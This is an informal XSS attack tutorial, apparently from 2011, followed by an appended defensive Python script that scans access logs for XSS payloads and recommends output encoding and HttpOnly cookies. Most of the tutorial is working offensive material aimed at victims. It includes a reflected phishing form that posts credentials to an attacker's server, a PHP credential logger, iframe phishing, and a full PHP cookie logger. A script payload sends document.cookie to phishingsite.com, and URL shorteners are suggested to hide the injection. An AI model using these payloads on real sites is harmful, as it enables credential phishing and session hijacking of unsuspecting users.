- Hey, today we're going to talk about XSS (cross-site scripting).
- We are talking about the common XSS attack types:
- Injectable by URL - client side
- Injectable via form fields - client side
- It depends whether we can inject PHP or HTML: if we can inject PHP then we can also inject HTML, but NOT vice versa.
- To find an XSS vulnerability the automatic way you can use:
- https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework
- To test it manually you use something like:
- `<script>alert("xss")</script>`
- That will pop up a window shouting xss on the client side (just your browser).
- For bypassing IDS/IPS you can encode it in hex etc.
- Or do things like:
- `'> <*script>alert("xss")<*/script>`
- But this manual shit is boring, so let's talk about some more interesting things.
- XSS PHISHING :DD
- All we do is grab a vulnerable popular URL, add the XSS payload to it, and send it to the victim as an embedded link.
- Like this:

```html
www.site.com/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.com/phishingscript.php">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
```

- You have to own "http://www.phishingsite.com/phishingscript.php", of course.
- Content of phishingscript.php:

```php
<?php
$login = $_POST['user'];
$password = $_POST['Password'];
$open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>
```
- Or maybe iframe phishing, like:
- `www.site.com/google.php?search=<iframe src="http://www.yourphishingsite.com" height="100%" width="100%"></iframe>`
- Enough with phishing, let's now talk about
- Cookie hijacking:
- Put a cookie logger script on your web page and inject JavaScript pointing at the cookie logger's address into the XSS-vulnerable site :)
- The script will handle the rest.
- cookielogger.php:
```php
<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();
    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}
logData();
?>
```
- Make a log.txt, put both of them on your webspace and set "chmod 777".
- Inject the following code into your target website:
- `http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>`
- Your vulnerable script will look like this, of course: `<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>`
- Use URL shortener services such as tinyurl.com or bit.ly to 'hide' your injection script from the victim.
- Information and code from 2011.
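As an added defender's example (not part of the original paste), the script below scans web server access-log lines for the reflected payload shapes described above (script tags carrying `document.cookie`/`location.href`, iframe and form injections) after URL-decoding them, since the paste notes that payloads get hex/percent-encoded to slip past filters. The log lines, client IPs and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache combined-format access-log lines (not from any real
# server). The first two carry the cookie-theft and iframe payload shapes
# from the paste, percent-encoded as a browser would send them; the third
# is a benign search for comparison.
SAMPLE_LOG = r'''
203.0.113.7 - - [10/Mar/2011:12:00:01 +0000] "GET /google.php?search=%3Cscript%3Elocation.href%3D%27http%3A%2F%2Fphishingsite.example%2Fcookiestealer.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Mar/2011:12:00:02 +0000] "GET /google.php?search=%3Ciframe%20src%3D%22http%3A%2F%2Fphishing.example%22%20height%3D%22100%25%22%3E%3C%2Fiframe%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2011:12:00:03 +0000] "GET /google.php?search=cross+site+scripting HTTP/1.1" 200 512 "-" "Mozilla/5.0"
'''

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# Markers of the reflected-XSS payloads used for phishing and cookie theft.
MARKERS = {
    'script_tag':      re.compile(r'<\s*script\b', re.I),
    'iframe_tag':      re.compile(r'<\s*iframe\b', re.I),
    'form_tag':        re.compile(r'<\s*form\b', re.I),
    'document_cookie': re.compile(r'document\.cookie', re.I),
    'location_href':   re.compile(r'location\.href', re.I),
    'javascript_uri':  re.compile(r'javascript\s*:', re.I),
}

def normalize(value, rounds=3):
    """URL-decode repeatedly so single- and double-encoded payloads compare equal."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (client_ip, parameter, marker names) for a suspicious line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group('target')).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)          # parse_qsl already decoded one layer
        hits = [k for k, p in MARKERS.items() if p.search(value)]
        if hits:
            return (m.group('ip'), name, hits)
    return None

def scan_log(text):
    """Scan every line of an access log; return only the suspicious ones."""
    return [r for r in (scan_line(l) for l in text.strip().splitlines()) if r]
```

This only surfaces attempts after the fact; the fix for the `search` parameter is to HTML-encode it on output (`htmlspecialchars` in PHP) and to mark session cookies HttpOnly so `document.cookie` cannot read them.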